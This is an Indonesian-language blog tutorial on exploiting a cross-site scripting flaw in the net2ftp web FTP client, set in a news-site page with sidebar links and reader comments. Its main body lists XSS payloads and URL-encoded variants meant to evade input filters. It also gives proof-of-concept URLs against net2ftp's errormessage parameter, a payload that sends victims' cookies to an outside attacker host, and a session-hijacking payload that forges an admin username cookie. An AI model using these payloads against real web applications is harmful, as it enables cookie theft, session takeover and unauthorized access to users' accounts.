Selasa, Juni 25, 2019
Text Size

Search

Update Berita

SSL to secure from hacker attacks

Open-source software developer Kai Engert has proposed an overhaul to the Internet's SSL...

Cara Menghemat Bandwidth Internet, mempercepat browsing

Ada situasi ketika menggunakan internet kita harus benar-benar hemat dengan penggunaan bandwidth ...

Istana Merespons Aksi 313 Berhentikan Ahok

Juru Bicara Presiden Joko Widodo, Johan Budi Sapto Pribowo menegaskan, Presiden Jokowi sangat...

Twitter Bakal Sediakan Layanan Berbayar?

KOMPAS.com - Setelah selama ini hanya meyediakan layanan gratis yang didukung iklan, Twitter...

Megawati: Ahok, Sudahlah Jangan Cerewet

.   Kompas.com - Megawati menasihati Ahok agar tidak terlalu banyak bicara. Mengingat kondi...

Butuh kеrjа? Cоbа cеk di Jооblе

Butuh kеrjа? Cоbа cеk di Jооblе.       Pаdа zаmаn yаng sаngаt k...

  • Tips mengatasi bosen dalam pekerjaan

    Kamis, 01 November 2012 07:48
  • Grunt Mars probe stranded in Earth orbit

    Kamis, 10 November 2011 09:40
  • SSL to secure from hacker attacks

    Senin, 27 Februari 2012 21:09
  • Cara Menghemat Bandwidth Internet, mempercepat browsing

    Minggu, 23 September 2012 18:03
  • Istana Merespons Aksi 313 Berhentikan Ahok

    Kamis, 30 Maret 2017 19:45
  • Twitter Bakal Sediakan Layanan Berbayar?

    Kamis, 30 Maret 2017 19:49
  • Megawati: Ahok, Sudahlah Jangan Cerewet

    Kamis, 30 Maret 2017 19:54
  • Butuh kеrjа? Cоbа cеk di Jооblе

    Kamis, 30 Maret 2017 20:09
Cross Site Scripting XSS dan Session Hijacking pada Net2ftp
SocialTwist Tell-a-Friend

Cross Site Scripting XSS dan Session Hijacking pada Net2ftp

Penilaian Pengunjung: / 2
KurangTerbaik 

Abis solat subuh iseng-iseng bangunin si slacky 12.1 lanjutin pelajaran yang iseng-iseng juga  postingan kali ini membahas lagi tentang bugs cross site scripting atau XSS, emang bugs yang satu ini walaupun udah jadul tapi gak ada habisnya web aplikasi yang terkena dampak yang berakibat cookie stealing, deface, de’elel. Pada aplikasi ftp berbasis web yaitu net2ftp dan homepage nya http://www.net2ftp.com.

Bugs ini di temukan oleh Voodoo Research Group yang terdapat pada file includes/registerglobals.inc.php pada baris 1088 s/d 1102 jadi bukan gue yang nemuin, gue masih pemula cuma lagi belajar aja sama master-master researcher security heheh  , disini saya akan menjelaskan sedikit bagaimana cara mengeksploitasinya dan anda sendiri tinggal mengembangkannya seperti bugs Cross Site Request Forgery, sembari nulis ini,sekalian minum teh anget pagi-pagi memang nikmat

XSS terjadi karena dalam validasi input yang tidak baik pada form, yang mengakibatkan attacker dapat memasukkan kode jahatnya ke dalam form,

Berikut ini script-script yang bisa kita coba untuk mengecek apakah web aplikasi vulnerable atau tidak ;

<script>alert(”XSS”)</script>
<script\>alert(\’XSS\’)\<\/script\>
<script>javascript:alert(documentt.cookie)</script>
<script>javascript:alert(”XSS”)</script>
“<script>alert()</script>”hati-hati ada xss!
?<script>alert(’XSS’)</script>

Pada search form ;

[host]/search.php?searchstring=<script>alert(’XSS’)</script>

Berikut ini script yang di encode untuk mengelabuhi proses input validation ;

[host]/%3cscript%3ealert(’XSS’)%3c/script%3e
[host]/?%3cscript%3ealert(’XSS’)%3c/script%3e
%3Cscript%3Ealert(document.cookie)%3C/script%3E

dan 100% encode yang merupakan bentuk lain dari <script>alert(document.cookie)</script>

[host]/?%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d
%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

Mencuri cookie ;

http://korban/page.php?variable=”><script>document.location=’http://www.situsgue.com/cgi-bin/cookie.cgi?’%20+document.cookie</script>

dan masih banyak lagi,,,,

PoC pada Net2Ftp
cek apakah vulnerable ?

http://korban.com/net2ftp/?state=login_small&errormessage=?state=login_small&errormessage=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Jika berhasil akan muncul pop-up seperti di bawah ini ,

xss

Cookie Stealing :
Dengan memanfaatkan XSS bugs, bisa kita gunakan untuk mencuri cookie yang tersimpan di server, setelah kode berhasil di eksekusi maka akan muncul pop-up isi dari cookie yang tersimpan di server,

<script>alert(document.cookie)</script>

lalu di encode menjadi

%3Cscript%3Ealert(document.cookie)%3C/script%3E

Poc :

http://korban.com/net2ftp/?state=login_small&errormessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E

cookie

Session Hijacking

Definisi Session Hijacking yang saya contek mentah-mentah,

“session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim’s computer”

Ibaratnya anda menjatuhkan kunci rumah anda di depan halaman, lalu maling mengambil kunci tersebut dan berhasil masuk karena kunci yang anda jatuhkan, pintu rumah tentunya tidak mengenal siapa saja penghuni rumah itu, tapi pintu tersebut hanya mengenal kunci sebagai otentifikasi,

Sama halnya dengan Web Aplikasi yang menggunakan proses otentifikasi untuk menaungi user yang ada di dalamnya, cookies kita ibaratkan dengan kunci, dan pintu sebagai sistem aplikasinya. bisa di bayangkan cookies di curi pada aplikasi per-bankan atau sistem belanja online.

Setelah cookies yang kita dapatkan dengan cara di atas, seorang attacker mampu untuk mengelabuhi sistem jika cookies menyimpan informasi username dan password dengan meng-injeksi script ke dalam sistem seperti script di bawah ini,

http://korban.com/net2ftp/?state=login_small&errormessage=%3Cscript%3Ejavascript:void(document.cookie=%22net2ftpcoo
kie_username=Admin%22)%3C/script%3E

session hijacking

Sekian, Mohon maaf jika postingan ini gak guna namanya juga newbies  , silahkan meninggalkan caci dan makiannya

Comments
Add New Search
sahid  - kritik   |114.58.92.xxx |2009-12-18 16:12:39
bagus
sahid  - re: kritik   |114.58.92.xxx |2009-12-18 16:13:41
bagus fffff
dryx212  - hehehhe   |110.137.229.xxx |2010-03-07 03:37:25


kal;o yang ini termasuk XSS bukan kk master
Write comment
Name:
Email:
 
Website:
Title:
 
:angry::0:confused::cheer:B):evil::silly::dry::lol::kiss::D:pinch:
:(:shock::X:side::):P:unsure::woohoo::huh::whistle:;):s
:!::?::idea::arrow:
 
Please input the anti-spam code that you can read in the image.

3.25 Copyright (C) 2007 Alain Georgette / Copyright (C) 2006 Frantisek Hliva. All rights reserved."

Advertisement Site




Ads - World Friend

Ads - World Friend

Berita lain-lainnya

Pasang Iklan
27/01/2010 | Indra Febria Widy
article thumbnail

  World Friend Indonesia adalah sebuah website berbasis web 2.0 dimana informasi website disampaikan melalui pengguna website World Friend Indonesia dan platform sosial untuk kepentingan informasi [ ... ]


Dua Raksas Amerika Melirik Arab
26/04/2010 | Indra Febria Widy
article thumbnail


Dibolehkannya karakter huruf nonlatin untuk masuk ke dunia maya memberikan peluang bagi negara-negara di Timur Tengah. Microsoft dan Google menganggap hal ini sebagai peluang 'pelebaran saya [ ... ]